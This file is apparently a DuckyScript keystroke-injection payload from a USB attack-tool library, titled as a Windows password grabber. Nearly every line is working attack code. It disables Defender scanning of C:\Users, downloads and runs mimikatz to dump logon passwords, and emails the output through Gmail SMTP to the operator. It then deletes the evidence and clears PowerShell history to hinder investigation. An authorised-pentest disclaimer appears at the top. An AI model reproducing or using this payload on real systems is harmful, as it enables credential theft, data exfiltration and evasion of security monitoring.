Path: blob/master/payloads/library/credentials/Simple_User_Password_Grabber/payload.txt
2968 views
REM Title: windows password grabber1REM Arthor makozort, https://github.com/makozort2REM Target: windows 10 (with admin access), might work with windows 7 idk3REM THIS IS FOR AUTHORISED USE ON MACHINES YOU EITHER OWN OR HAVE BEEN GIVEN ACCESS TO PEN TEST, MAKOZORT IS NOT LIABLE FOR ANY MISUSE OF THIS SCRIPT4REM --------------set default delay based on targets computer speed, 350 is around mid range (I think)5DEFAULT_DELAY 3506REM -------------first delay is 1 second (you may need more) to let windows set up the "keyboard"7DELAY 10008REM ------------open powershell as admin and set an exclusion path in the C:\Users path9GUI r10STRING powershell11CTRL-SHIFT ENTER12DELAY 60013ALT y14STRING Set-MpPreference -ExclusionPath C:\Users15ENTER16STRING exit17ENTER18REM -------------download mimikatz19GUI r20STRING cmd21CTRL-SHIFT ENTER22DELAY 60023ALT y24STRING powershell (new-object System.Net.WebClient).DownloadFile('LINK TO MIMIKATZ.EXE DOWNLOAD HERE','%temp%\pw.exe')25ENTER26REM ------------run the following mimikatz commands and print results in new txt file27DELAY 400028STRING %TEMP%\pw.exe > c:\pwlog.txt & type pwlog.txt;29ENTER30STRING privilege::debug31ENTER32STRING sekurlsa::logonPasswords full33ENTER34STRING exit35ENTER36REM< --------- delete mimikatz37STRING del %TEMP%\pw.exe38ENTER39STRING exit40ENTER41REM -------------email the pwlog.txt to your email42GUI r43STRING powershell44CTRL-SHIFT ENTER45DELAY 60046ALT y47STRING Remove-MpPreference -ExclusionPath C:\Users48ENTER49STRING $SMTPServer = 'smtp.gmail.com'50ENTER51STRING $SMTPInfo = New-Object Net.Mail.SmtpClient($SmtpServer, 587)52ENTER53STRING $SMTPInfo.EnableSsl = $true54ENTER55STRING $SMTPInfo.Credentials = New-Object System.Net.NetworkCredential('THE-PART-OF-YOUR-EMAIL-BEFORE-THE-@56SHIFT 257STRING gmail.com', 'PASSWORDHERE');58ENTER59STRING $ReportEmail = New-Object System.Net.Mail.MailMessage60ENTER61STRING $ReportEmail.From = 'THE-PART-OF-YOUR-EMAIL-BEFORE-THE-@62SHIFT 263STRING gmail.com'64ENTER65STRING $ReportEmail.To.Add('THE-PART-OF-RECEIVERS-EMAIL-BEFORE-THE-@66SHIFT 267STRING gmail.com')68ENTER69STRING $ReportEmail.Subject = 'Hello from the ducky'70ENTER71STRING $ReportEmail.Body = 'Attached is your duck report.'72ENTER73STRING $ReportEmail.Attachments.Add('c:\pwlog.txt')74ENTER75STRING $SMTPInfo.Send($ReportEmail)76ENTER77DELAY 400078STRING exit79ENTER80REM ------cleanup time81GUI r82STRING powershell83CTRL-SHIFT ENTER84DELAY 60085ALT y86REM ----------delete the txt file87STRING del c:\pwlog.txt88ENTER89REM -------remove powershell history (this probably wont be enough to remove all traces of you, this is just to prevent inital investigations90STRING Remove-Item (Get-PSreadlineOption).HistorySavePath91ENTER92STRING exit93ENTER94REM ------lock the pc95GUI l969798